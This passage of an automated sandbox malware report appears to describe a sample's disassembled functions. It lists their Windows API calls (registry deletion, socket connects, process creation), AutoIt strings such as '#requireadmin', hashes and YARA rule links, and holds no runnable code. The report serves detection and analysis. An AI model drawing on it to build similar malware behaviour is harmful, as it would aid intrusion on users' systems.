                                                                              • __fassign.LIBCMT ref: 02F57C59
                                                                              • __fassign.LIBCMT ref: 02F57C74
                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 02F57C9A
                                                                              • WriteFile.KERNEL32(?,?,00000000,02F58311,00000000,?,?,?,?,?,?,?,?,?,02F58311,?), ref: 02F57CB9
                                                                              • WriteFile.KERNEL32(?,?,00000001,02F58311,00000000,?,?,?,?,?,?,?,?,?,02F58311,?), ref: 02F57CF2
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1454997766.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2f10000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                              • String ID:
                                                                              • API String ID: 1324828854-0
                                                                              • Opcode ID: 113cc342b61fdc85e8ff9ce9b3d7808df4e60c2a3f50ff56177c27f1ae5a7447
                                                                              • Instruction ID: ab84bf6df324ad394f49a2c17d1abef14179241d8ea28f29373d5fb5b7a5fd9e
                                                                              • Opcode Fuzzy Hash: 113cc342b61fdc85e8ff9ce9b3d7808df4e60c2a3f50ff56177c27f1ae5a7447
                                                                              • Instruction Fuzzy Hash: 3A51B171E002599FDB10DFA8D884AEEFBB9EF09340F14455AEB56E7281D730A951CBA0
                                                                              Function 004655FD Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: _wcsncpy$LocalTime
                                                                              • String ID:
                                                                              • API String ID: 2945705084-0
                                                                              • Opcode ID: 07e0947fe95a8180eaf0aa6e348e8d9897622cda980e67335bb2af8a3bf9752e
                                                                              • Instruction ID: 7a6b7d837badcf90248cfae842bd011e2e93fbf2a36f5ea1b26b70f3dca78a8a
                                                                              • Opcode Fuzzy Hash: 07e0947fe95a8180eaf0aa6e348e8d9897622cda980e67335bb2af8a3bf9752e
                                                                              • Instruction Fuzzy Hash: 5541B565D1022476CB11EBB59846ACFB7B8AF05311F90485BF508E3221FA78E285C7AE
                                                                              Function 0045D56C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 121comlibraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0045D5D4
                                                                              • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0045D60A
                                                                              • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0045D61B
                                                                              • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 0045D69D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorMode$AddressCreateInstanceProc
                                                                              • String ID: ,,I$DllGetClassObject
                                                                              • API String ID: 753597075-1683996018
                                                                              • Opcode ID: 33bd84876332b2fdda090ed26e6294b9c181052f8b99c0919512b630bc0f7b16
                                                                              • Instruction ID: 3f0141d9bf832a65cf1f2fff52dd88c9064c6a7eaa25d9247cf5eee920db5d90
                                                                              • Opcode Fuzzy Hash: 33bd84876332b2fdda090ed26e6294b9c181052f8b99c0919512b630bc0f7b16
                                                                              • Instruction Fuzzy Hash: 1B41A4B1900204EFDF24DF14C884A9A7BA9EF44315F1581AEEC09DF206D7B4DD49CBA8
                                                                              Function 00463671 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 0046466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00463697,?), ref: 0046468B
                                                                                • Part of subcall function 0046466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00463697,?), ref: 004646A4
                                                                              • lstrcmpiW.KERNEL32(?,?), ref: 004636B7
                                                                              • _wcscmp.LIBCMT ref: 004636D3
                                                                              • MoveFileW.KERNEL32(?,?), ref: 004636EB
                                                                              • _wcscat.LIBCMT ref: 00463733
                                                                              • SHFileOperationW.SHELL32(?), ref: 0046379F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                                              • String ID: \*.*
                                                                              • API String ID: 1377345388-1173974218
                                                                              • Opcode ID: 3f0f69ac01daa6019ea7883590d89e46cbcf260a567c4b816384ba6a57f53713
                                                                              • Instruction ID: 4e874dc4fae4897927e7b4621483e23afab501f30efb2571b7469179fc3cc0d5
                                                                              • Opcode Fuzzy Hash: 3f0f69ac01daa6019ea7883590d89e46cbcf260a567c4b816384ba6a57f53713
                                                                              • Instruction Fuzzy Hash: 1A418FB1508344AEC752EF65D4419DFB7E8AF88345F40082FB48AC3261FA38D689C75B
                                                                              Function 00487291 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 004872AA
                                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00487351
                                                                              • IsMenu.USER32(?), ref: 00487369
                                                                              • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004873B1
                                                                              • DrawMenuBar.USER32 ref: 004873C4
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: Menu$Item$DrawInfoInsert_memset
                                                                              • String ID: 0
                                                                              • API String ID: 3866635326-4108050209
                                                                              • Opcode ID: 0ee1f44b2a5140251d286675eb963f933f852416e711f3c94e98620d4ff88054
                                                                              • Instruction ID: fcd3fc1e0e94e91f8146e9bbeff2772ee04bbaba0065c2a20de26dc7b403efd4
                                                                              • Opcode Fuzzy Hash: 0ee1f44b2a5140251d286675eb963f933f852416e711f3c94e98620d4ff88054
                                                                              • Instruction Fuzzy Hash: AA411675A04208AFDB20EF50D894A9EBBB4FB04350F24882AFD15A7360D734ED64EB65
                                                                              Function 00480FA5 Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00480FD4
                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00480FFE
                                                                              • FreeLibrary.KERNEL32(00000000), ref: 004810B5
                                                                                • Part of subcall function 00480FA5: RegCloseKey.ADVAPI32(?), ref: 0048101B
                                                                                • Part of subcall function 00480FA5: FreeLibrary.KERNEL32(?), ref: 0048106D
                                                                                • Part of subcall function 00480FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00481090
                                                                              • RegDeleteKeyW.ADVAPI32(?,?), ref: 00481058
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                              • String ID:
                                                                              • API String ID: 395352322-0
                                                                              • Opcode ID: b5131dabd4a2a67cadfd2e986b415e323ff756628087c751aedefec5cbf298fe
                                                                              • Instruction ID: 3e22e70b6f2616eb7250a30d7d8a48524582d6e50c9a57dc89dcd50e66651605
                                                                              • Opcode Fuzzy Hash: b5131dabd4a2a67cadfd2e986b415e323ff756628087c751aedefec5cbf298fe
                                                                              • Instruction Fuzzy Hash: E2311D71900109BFDB15AF90DC89EFFB7BCEF09300F10096BE501E2251D6745E8A9BA9
                                                                              Function 004862CD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 004862EC
                                                                              • GetWindowLongW.USER32(00A5C970,000000F0), ref: 0048631F
                                                                              • GetWindowLongW.USER32(00A5C970,000000F0), ref: 00486354
                                                                              • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00486386
                                                                              • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 004863B0
                                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 004863C1
                                                                              • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 004863DB
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: LongWindow$MessageSend
                                                                              • String ID:
                                                                              • API String ID: 2178440468-0
                                                                              • Opcode ID: b6c63574b2784a6fe8e125d212b22f8229395cc3faf42e06ca4ca63f68dab27c
                                                                              • Instruction ID: de0077e50bd3e6fac1d65856e76e1ec94ed34838b8122e9b1a950ed70c11c10c
                                                                              • Opcode Fuzzy Hash: b6c63574b2784a6fe8e125d212b22f8229395cc3faf42e06ca4ca63f68dab27c
                                                                              • Instruction Fuzzy Hash: 2B3125306001509FDB61EF18EC84F6E37E1FB4A714F1A05B9F9009F2B1CB75A8849B59
                                                                              Function 00476173 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00477D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00477DB6
                                                                              • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 004761C6
                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 004761D5
                                                                              • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 0047620E
                                                                              • connect.WSOCK32(00000000,?,00000010), ref: 00476217
                                                                              • WSAGetLastError.WSOCK32 ref: 00476221
                                                                              • closesocket.WSOCK32(00000000), ref: 0047624A
                                                                              • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00476263
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                                              • String ID:
                                                                              • API String ID: 910771015-0
                                                                              • Opcode ID: 2c772d8cd10b281ebb58c123377a2f6f77deb8af44f3e8561ff8297571aede33
                                                                              • Instruction ID: 9a8db824e4f103e753759010288aef610dd859574b1bdde890bb221953e34ba6
                                                                              • Opcode Fuzzy Hash: 2c772d8cd10b281ebb58c123377a2f6f77deb8af44f3e8561ff8297571aede33
                                                                              • Instruction Fuzzy Hash: E131C671600104ABDF10BF64CC85BBE77ADEB45714F05846EFD09A7292DB78AC088B65
                                                                              Function 0045F65E Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: __wcsnicmp
                                                                              • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                              • API String ID: 1038674560-2734436370
                                                                              • Opcode ID: 842b6d77a2cf942784fc1cb80210373f95780450b82a097604e26ce594b18ecd
                                                                              • Instruction ID: 032906fc094d91378a6d64986483b761754d261e1b02b5d61cc05f8db2f6dc85
                                                                              • Opcode Fuzzy Hash: 842b6d77a2cf942784fc1cb80210373f95780450b82a097604e26ce594b18ecd
                                                                              • Instruction Fuzzy Hash: E621487220412166D620AA35AC02FA773D8AF59305B90443BFC4286192EB9C9D4EC29F
                                                                              Function 004875CD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00401D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00401D73
                                                                                • Part of subcall function 00401D35: GetStockObject.GDI32(00000011), ref: 00401D87
                                                                                • Part of subcall function 00401D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00401D91
                                                                              • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00487632
                                                                              • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0048763F
                                                                              • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0048764A
                                                                              • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00487659
                                                                              • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00487665
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$CreateObjectStockWindow
                                                                              • String ID: Msctls_Progress32
                                                                              • API String ID: 1025951953-3636473452
                                                                              • Opcode ID: 89b1357e1ee64075d60cbe96e93ddb663670d2e9d7f59c86534f55b80d263953
                                                                              • Instruction ID: 4837c572468b061b20148283283cd62aa6e96b5405c17b40ad05b898919227a4
                                                                              • Opcode Fuzzy Hash: 89b1357e1ee64075d60cbe96e93ddb663670d2e9d7f59c86534f55b80d263953
                                                                              • Instruction Fuzzy Hash: B711D3B1110119BFEF109F64CC85EEB7F5DEF083A8F114115BA04A21A0D776AC21DBA8
                                                                              Function 02F53216 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 02F531DA: _free.LIBCMT ref: 02F53203
                                                                              • _free.LIBCMT ref: 02F53264
                                                                                • Part of subcall function 02F52096: HeapFree.KERNEL32(00000000,00000000,?,02F53208,?,00000000,?,00000000,?,02F5322F,?,00000007,?,?,02F52697,?), ref: 02F520AC
                                                                                • Part of subcall function 02F52096: GetLastError.KERNEL32(?,?,02F53208,?,00000000,?,00000000,?,02F5322F,?,00000007,?,?,02F52697,?,?), ref: 02F520BE
                                                                              • _free.LIBCMT ref: 02F5326F
                                                                              • _free.LIBCMT ref: 02F5327A
                                                                              • _free.LIBCMT ref: 02F532CE
                                                                              • _free.LIBCMT ref: 02F532D9
                                                                              • _free.LIBCMT ref: 02F532E4
                                                                              • _free.LIBCMT ref: 02F532EF
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1454997766.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2f10000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                              • String ID:
                                                                              • API String ID: 776569668-0
                                                                              • Opcode ID: fcd263e1e97f9626aa0bdc167c26919d6134e182e28646451650430cd4015995
                                                                              • Instruction ID: a7e99d290bfe2c07e89a5919acf851c7b6f57b9466dc14771cc5b854f372563e
                                                                              • Opcode Fuzzy Hash: fcd263e1e97f9626aa0bdc167c26919d6134e182e28646451650430cd4015995
                                                                              • Instruction Fuzzy Hash: 2A111C72E41B24AAE630FBB4CC05FCB779EAF06BC0F444D55AF9EA6050DA65B5048F50
                                                                              Function 0048B635 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40processCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 0048B644
                                                                              • _memset.LIBCMT ref: 0048B653
                                                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,004C6F20,004C6F64), ref: 0048B682
                                                                              • CloseHandle.KERNEL32 ref: 0048B694
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: _memset$CloseCreateHandleProcess
                                                                              • String ID: oL$doL
                                                                              • API String ID: 3277943733-3421622115
                                                                              • Opcode ID: f6592324f54b6d11ff0072cf87150bc2a8f8a0fa5e3a8a7e269d397b8f6a706e
                                                                              • Instruction ID: 7a1fecbce043cfc874fe0d77b44da30ff063324afa3e4e90fef9887594455fd0
                                                                              • Opcode Fuzzy Hash: f6592324f54b6d11ff0072cf87150bc2a8f8a0fa5e3a8a7e269d397b8f6a706e
                                                                              • Instruction Fuzzy Hash: 20F05EB26403107AE2502761BC06FBB3A9CEB08395F41843ABE08E5192D7799C00C7AC
                                                                              Function 0042406B Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00423F85), ref: 00424085
                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0042408C
                                                                              • EncodePointer.KERNEL32(00000000), ref: 00424097
                                                                              • DecodePointer.KERNEL32(00423F85), ref: 004240B2
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                              • String ID: RoUninitialize$combase.dll
                                                                              • API String ID: 3489934621-2819208100
                                                                              • Opcode ID: a073a7a123edb79e47074a0cfae65335df484428d24780242fe31235a0946bf9
                                                                              • Instruction ID: 3c20c996fd7074992a56bc66f3091c9a5c2557e351e9bc0918c4c0f6e68dcf68
                                                                              • Opcode Fuzzy Hash: a073a7a123edb79e47074a0cfae65335df484428d24780242fe31235a0946bf9
                                                                              • Instruction Fuzzy Hash: DBE09270681200AFEA90AF62ED0DB8A3AA5B704743F14893AF501E11A0CFBA46489B1C
                                                                              Function 02F544E9 Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,?,00000000,?,?,?,02F5473A,?,?,00000000), ref: 02F54543
                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,02F5473A,?,?,00000000,?,?,?), ref: 02F545C9
                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 02F546C3
                                                                              • __freea.LIBCMT ref: 02F546D0
                                                                                • Part of subcall function 02F532FA: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 02F5332C
                                                                              • __freea.LIBCMT ref: 02F546D9
                                                                              • __freea.LIBCMT ref: 02F546FE
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1454997766.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2f10000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                              • String ID:
                                                                              • API String ID: 1414292761-0
